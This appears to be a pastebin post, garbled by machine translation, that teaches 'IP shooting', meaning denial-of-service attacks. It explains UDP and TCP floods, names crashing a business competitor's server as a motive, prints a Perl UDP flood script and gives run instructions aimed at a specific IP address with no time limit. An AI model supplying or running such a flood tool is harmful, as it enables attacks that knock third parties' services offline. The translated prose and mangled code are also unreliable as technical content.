IP shooting script


SUBMITTED BY: teewaweth

DATE: May 21, 2017, 4:06 p.m.

FORMAT: Text only

SIZE: 3.7 kB

HITS: 687

  1. IP shooting script
  2.   In this article I will talk about IP shooting, whether it is IP Camfox, Foxy, IP Add, Dos Ping, DDos how it works, and why to shoot and shoot to.
  3.   In the question of whether to fire his IP for anything, the main answer is "pure" or to destroy a competitor in finance or business.
  4.   In IP shooting, even if you do not have a server. If only one person "repeat" if only one person. One chance to make the server crash is difficult.
  5.    Hackers will have a different approach to shoot the server. But DDOS, TCP Flood, UDP Flood are popular. Some people ask, "What is DDOS?" I do not want to mock the law. It does not give a definite answer, whether it is a "strong IP attack IP".
  6.   What is DDoS?
  7. DDos (Distributedenial-of-service) is a characteristic or method of attacking a target computer or target system. Meant on the internet To make the target system deny or stop serving. (Denial-of-Service) attacks are simultaneous and have the same goal. By all victims. (An infected machine spreads a malicious code that is a hacker's tool for system control.) It creates junk and then sends it to the target system. Huge volume To achieve the target system. Work harder and slow down. When it exceeds the acceptable level, it stops. Eventually, the user is unable to use the target system service normally.
  8.   
  9. Source: http: //autliwsaki.wordpress.com/
  10.   The question is "I have a strong IP attack". What strength or what? It's up to you to compile the victim's computer if you "waste" but the victim's "cruel" is not guessed, I know. You are not alone, the Floods, it's the force of it.
  11.  Anyone who does not understand what TCP Flood, UDP Flood, Syn Flood is? Anybody waiting for me to update the article, I can use Google to find or want to know really how it works if in Thailand there is no such article. Foreign countries are available to read offline.
  12.   Okay, come to the IP hacking IP, I will rub the language of Perl because it is very easy to write. Easy to understand (Anyone who wants to write an IP-based sc script, then find out from Google the key to finding it. Socket Programming Perl ")
  13. #! / Usr / bin / Perl
  14.   
  15. Use Socket;
  16. $ ARGC = @ ARGV;
  17. If ($ ARGC! = 3) {
  18.      Printf "$ 0 <ip> <port> <time> n";
  19.      Printf "if arg1 / 2 = 0, randports / continous packets.n";
  20. Exit (1);
  21.          }
  22.      We ($ ip, $ port, $ size, $ time);
  23.      $ Ip = $ ARGV [0];
  24.      $ Port = $ ARGV [1];
  25.      $ Time = $ ARGV [2];
  26. Socket (crazy, PF_INET, SOCK_DGRAM, 17);
  27.     $ Iaddr = inet_aton ("$ ip");
  28. Printf "Attack To Server $ ip By NoName";
  29. If ($ ARGV [1] == 0 && $ ARGV [2] == 0) {
  30.     Goto randpackets;
  31.     }
  32. If ($ ARGV [1]! = 0 && $ ARGV [2]! = 0) {
  33. System ("(sleep $ time; killall -9 udp) &");
  34. Goto packets;
  35.      }
  36. If ($ ARGV [1]! = 0 && $ ARGV [2] == 0) {
  37. Goto packets;
  38.     }
  39. If ($ ARGV [1] == 0 && $ ARGV [2]! = 0) {
  40. System ("(sleep $ time; killall -9 udp) &");
  41. Goto randpackets;
  42.     }
  43. Packets:
  44. For (;;) {
  45. $ Size = $ rand x $ rand x $ rand;
  46. Send (crazy, 0, $ size, sockaddr_in ($ port, $ iaddr));
  47.    }
  48. Randpackets:
  49. For (;;) {
  50. $ Size = $ rand x $ rand x $ rand;
  51. $ Port = int (rand 65000) +1;
  52. Send (crazy, 0, $ size, sockaddr_in ($ port, $ iaddr));
  53.    }
  54. ################################################
  55. How to use it.
  56. Start >> Run >> Cmd Pim
  57. And Pim at the Cmd screen says
  58. Cd
  59. Then Enter 1 time
  60. Then the gun command is udp.pl IP pot.
  61. Enter 0 meaning there is a sense of run.
  62. For example, let's say I shoot IP. 217.170.194.225 I have to say that.
  63. Udp.pl 217.170.194.225 0 0
  64. Then press Enter. This script is attacking IP. 217.170.194.225 Run, snoop and not limit attack time.
  65. Press Ctrl + C to stop shooting.

comments powered by Disqus